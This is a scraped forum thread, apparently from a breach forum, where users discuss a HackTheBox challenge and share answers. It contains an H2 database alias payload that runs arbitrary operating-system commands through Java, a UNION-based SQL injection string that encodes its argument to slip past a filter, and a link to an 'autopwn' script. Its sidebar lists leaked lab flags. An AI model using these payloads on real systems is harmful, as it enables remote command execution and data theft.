Pentest Notes Hackthebox Challenge flag
by trevor69000 - Sunday October 27, 2024 at 07:17 AM
RaidForums
Member
Posts: 98
Threads: 6
Joined: Mar 2024
Reputation: 17

#11
11-15-2024, 12:40 PM
(11-14-2024, 10:59 PM)0xhdfg Wrote:
(10-27-2024, 08:12 PM)mazafaka555 Wrote:
(10-27-2024, 07:50 PM)Steward Wrote: you should better explain how to bypass filter for $$ and CONCAT instead of just flag

create aliases without a  `$`
CREATE ALIAS EXECVE AS 'String execve(String cmd) throws java.io.IOException { return new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").hasNext() ? new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\\\A").next() : ""; }';


How can I then use the alias? I'm trying something like: 
SQL Injection' OR 1=0 UNION SELECT EXECVE(CHAR(119) + CHAR(104) + CHAR(111) + CHAR(97) + CHAR(109) + CHAR(105)) -- -
to bypass CONCAT but I don't get it to work :/

i posted AutoPwn script here for your consumption :
http://breachddyfwvcp4kzccos5oxtdbssmfbp...pwn-script
Reply
RaidForums
Member
Posts: 13
Threads: 0
Joined: Nov 2024
Reputation: 0

#12
11-15-2024, 03:50 PM
Don't have credits, give me a clue :/
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 88,710 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 16 2,276 03-28-2026, 03:32 AM
Last Post: lulaladrow
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 597 88,992 03-27-2026, 10:54 PM
Last Post: w3soul
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,490 03-27-2026, 07:22 PM
Last Post: stn
  All reversing challenge - HTB - Flags @ 02/03/2025 fr34cker 7 1,275 03-27-2026, 08:01 AM
Last Post: escowbang



 Users browsing this thread: 1 Guest(s)